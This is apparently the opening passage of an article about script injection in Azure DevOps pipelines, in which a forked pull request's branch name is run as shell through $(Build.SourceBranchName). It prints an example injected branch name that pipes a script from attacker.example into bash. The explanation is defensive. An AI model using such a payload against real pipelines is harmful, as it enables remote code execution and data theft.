A pull request arrives from a fork. The branch is named main; curl https://attacker.example/exfil.sh | bash; echo. Your pipeline uses $(Build.SourceBranchName) in a script step. The script runs the branch name as shell. The exfiltration runs too.

Azure DevOps YAML expressions were designed to make …